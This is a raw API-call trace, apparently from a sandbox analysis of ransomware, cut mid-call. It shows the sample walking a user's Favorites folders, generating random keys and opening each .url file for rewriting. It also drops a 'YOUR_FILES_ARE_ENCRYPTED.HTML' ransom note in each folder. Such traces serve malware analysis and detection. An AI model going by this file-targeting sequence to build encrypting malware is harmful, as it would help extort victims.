(lpString1="Microsoft At Work.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.363] PathFindExtensionW (pszPath="Microsoft At Work.url") returned=".url" [0167.363] lstrlenW (lpString=".url") returned 4 [0167.363] PathFindExtensionW (pszPath="Microsoft At Work.url") returned=".url" [0167.363] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.363] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.363] CloseHandle (hObject=0x598) returned 1 [0167.363] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd61c0450, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0167.363] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 72 [0167.363] lstrcmpW (lpString1="Microsoft Store.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.363] PathFindExtensionW (pszPath="Microsoft Store.url") returned=".url" [0167.363] lstrlenW (lpString=".url") returned 4 [0167.363] PathFindExtensionW (pszPath="Microsoft Store.url") returned=".url" [0167.363] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.364] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=134) returned 1 [0167.364] CloseHandle (hObject=0x598) returned 1 [0167.364] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd61c0450, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0167.364] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.364] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0167.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.364] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.366] CloseHandle (hObject=0x5ac) returned 1 [0167.367] GetProcessHeap () returned 0x270000 [0167.367] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.367] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0167.367] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites") returned 46 [0167.367] GetProcessHeap () returned 0x270000 [0167.367] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.367] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites" [0167.367] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\*" [0167.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.434] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.434] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0167.435] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Autos.url") returned 60 [0167.435] lstrcmpW (lpString1="MSN Autos.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.435] PathFindExtensionW (pszPath="MSN Autos.url") returned=".url" [0167.435] lstrlenW (lpString=".url") returned 4 [0167.435] PathFindExtensionW (pszPath="MSN Autos.url") returned=".url" [0167.435] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.435] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.435] CloseHandle (hObject=0x598) returned 1 [0167.435] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0167.436] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 68 [0167.436] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.436] PathFindExtensionW (pszPath="MSN Entertainment.url") returned=".url" [0167.436] lstrlenW (lpString=".url") returned 4 [0167.436] PathFindExtensionW (pszPath="MSN Entertainment.url") returned=".url" [0167.436] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.436] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.436] CloseHandle (hObject=0x598) returned 1 [0167.436] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0167.436] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Money.url") returned 60 [0167.436] lstrcmpW (lpString1="MSN Money.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.436] PathFindExtensionW (pszPath="MSN Money.url") returned=".url" [0167.436] lstrlenW (lpString=".url") returned 4 [0167.436] PathFindExtensionW (pszPath="MSN Money.url") returned=".url" [0167.436] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.437] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.437] CloseHandle (hObject=0x598) returned 1 [0167.437] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0167.437] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Sports.url") returned 61 [0167.437] lstrcmpW (lpString1="MSN Sports.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.437] PathFindExtensionW (pszPath="MSN Sports.url") returned=".url" [0167.437] lstrlenW (lpString=".url") returned 4 [0167.437] PathFindExtensionW (pszPath="MSN Sports.url") returned=".url" [0167.437] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.438] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.438] CloseHandle (hObject=0x598) returned 1 [0167.438] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0167.438] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN.url") returned 54 [0167.438] lstrcmpW (lpString1="MSN.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.438] PathFindExtensionW (pszPath="MSN.url") returned=".url" [0167.438] lstrlenW (lpString=".url") returned 4 [0167.438] PathFindExtensionW (pszPath="MSN.url") returned=".url" [0167.438] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.438] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.438] CloseHandle (hObject=0x598) returned 1 [0167.438] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0167.438] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSNBC News.url") returned 61 [0167.438] lstrcmpW (lpString1="MSNBC News.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.438] PathFindExtensionW (pszPath="MSNBC News.url") returned=".url" [0167.438] lstrlenW (lpString=".url") returned 4 [0167.438] PathFindExtensionW (pszPath="MSNBC News.url") returned=".url" [0167.438] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.439] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.439] CloseHandle (hObject=0x598) returned 1 [0167.439] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0167.439] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.439] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0167.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.439] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.442] CloseHandle (hObject=0x5ac) returned 1 [0167.442] GetProcessHeap () returned 0x270000 [0167.443] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.443] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0167.443] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live") returned 46 [0167.443] GetProcessHeap () returned 0x270000 [0167.443] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.443] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live" [0167.443] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\*" [0167.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.637] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.637] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd61c0450, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0167.637] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Get Windows Live.url") returned 67 [0167.637] lstrcmpW (lpString1="Get Windows Live.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.637] PathFindExtensionW (pszPath="Get Windows Live.url") returned=".url" [0167.637] lstrlenW (lpString=".url") returned 4 [0167.637] PathFindExtensionW (pszPath="Get Windows Live.url") returned=".url" [0167.637] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.638] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.638] CloseHandle (hObject=0x598) returned 1 [0167.638] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd61c0450, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0167.638] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 71 [0167.638] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.638] PathFindExtensionW (pszPath="Windows Live Gallery.url") returned=".url" [0167.638] lstrlenW (lpString=".url") returned 4 [0167.638] PathFindExtensionW (pszPath="Windows Live Gallery.url") returned=".url" [0167.638] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.639] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.639] CloseHandle (hObject=0x598) returned 1 [0167.639] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0167.640] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Mail.url") returned 68 [0167.640] lstrcmpW (lpString1="Windows Live Mail.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.640] PathFindExtensionW (pszPath="Windows Live Mail.url") returned=".url" [0167.640] lstrlenW (lpString=".url") returned 4 [0167.640] PathFindExtensionW (pszPath="Windows Live Mail.url") returned=".url" [0167.640] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.640] CreateFileW 